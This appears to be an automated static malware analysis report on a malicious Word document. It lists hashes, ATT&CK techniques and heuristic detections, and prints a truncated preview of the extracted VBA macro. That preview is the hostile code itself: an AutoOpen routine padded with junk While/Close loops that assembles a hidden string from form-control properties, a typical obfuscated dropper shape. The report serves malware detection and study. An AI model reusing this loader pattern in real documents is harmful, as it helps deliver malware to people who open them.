Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6b6feaf5c5b705ee…

MALICIOUS

Office (OLE)

Size: 142.6 KB | Created: 2019-05-13 08:29:00 | Authoring application: Microsoft Office Word | First seen: 2019-08-04
MD5: b323269c8863b3caf1c1c2d65168069c
SHA-1: 0ca96a8fe7c0fe9ec1990e55e4e4e763ec604af6
SHA-256: 6b6feaf5c5b705ee1a1d906b58da9eecf7fbb483674c113b40e5c3ec3998b6c5
Risk Score: 282

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic; T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing obfuscated VBA macros, indicated by multiple critical and high severity heuristic firings, including 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC'. The presence of an AutoOpen macro together with GetObject calls indicates an attempt to execute code automatically when the document is opened. The obfuscated VBA and its use of execution sinks point to downloader or dropper functionality, likely intended to fetch and execute a second-stage payload.

Heuristics (8)

  • ClamAV: Doc.Malware.Dwsv-6969094-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Dwsv-6969094-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                                   | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source)      | 7691 bytes
SHA-256: 77f9e7657f6fcc0a5b28176a1c06d6e0035cb630c7f30d26ed1299d173d07e68
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "c6_08_2"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "O4479138"
Attribute VB_Base = "0{7384A44C-0D9F-4B05-99C1-397051F31C0C}{0C0CD53F-06EC-4942-A886-6F16522FC1F0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "K751520"

Attribute VB_Name = "j36653"

Attribute VB_Name = "B761938"

Attribute VB_Name = "k22067"

Attribute VB_Name = "T584185"
Attribute VB_Base = "0{9B59553E-8DF6-4759-9AEE-EE62BC88E8F8}{BC7E9576-4F0E-46BD-94BD-0B83EE6D22AB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "U37936"
Function I21348_(A6_66500)
   While O5076_01 And Q7533122
            Close ("o_9_719")
            Close ("O8745873")
            Close ("572637499")
            Close ("426475228")
Wend
   While P_2_8021 And N16053
            Close ("M284772")
            Close ("M841912_")
            Close ("996311077")
            Close ("267674380")
Wend
Set I21348_ = CVar(A6_66500)
   While T968497 And c716170
            Close ("A951__3")
            Close ("L414188")
            Close ("289413535")
            Close ("139420478")
Wend
   While z_052679 And s9660319
            Close ("a546_3_")
            Close ("N06186")
            Close ("578134735")
            Close ("310711921")
Wend
   While l38262 And a7216664
            Close ("p8519965")
            Close ("r295421")
            Close ("407827300")
            Close ("281538971")
Wend
End Function
Sub _
autoopen()
On Error Resume Next
   While m04481 And t662025
            Close ("k9461067")
            Close ("F22982")
            Close ("915245856")
            Close ("738609176")
Wend
   While F759570 And H721876
            Close ("T3_944")
            Close ("W8839944")
            Close ("266804217")
            Close ("966793857")
Wend
   While h_076__0 And d100632
            Close ("w3210213")
            Close ("s4_502__")
            Close ("8497356")
            Close ("32871551")
Wend
Call P86498
   While M_814952 And i70_5_8
            Close ("z1_44504")
            Close ("J65181")
            Close ("4823188")
            Close ("382711466")
Wend
   While b5345918 And Y6082297
            Close ("j2538265")
            Close ("z6_095_5")
            Close ("698889889")
            Close ("597923148")
Wend
End Sub


Attribute VB_Name = "q5049_9"
Function P86498()
On Error Resume Next
   While H882808 And X4606_
            Close ("K_883334")
            Close ("Y5951620")
            Close ("926572640")
            Close ("648812385")
Wend
   While a0084312 And F4932254
            Close ("J17831")
            Close ("P8026_")
            Close ("117489036")
            Close ("860536442")
Wend
N40123_1 = O4479138.f65590 + T584185.O7546837 + O4479138.f65590 + T584185.c0___794 + O4479138.f65590 + O4479138.f65590.Value + T584185.j27318 + O4479138.f65590.Text + O4479138.f65590.Tag + T584185.f760873 + O4479138.f65590.Tag + T584185.T819292 + O4479138.f65590.Text
   While w_14473 And M62333
            Close ("D60772_7")
            Close ("O2__894")
            Close ("504032362")
            Close ("374344734")
Wend
   While K232_4 And k4072688
            Close ("F5320237")
            Close ("G09187")
            Close ("789448707")
            Close ("654612179")
Wend
   While L__73268 And U_635264
            Close ("O25_31_")
            Close ("U841436")
            Close ("967293093")
            Close ("672131045")
Wend
Set h7
... (truncated)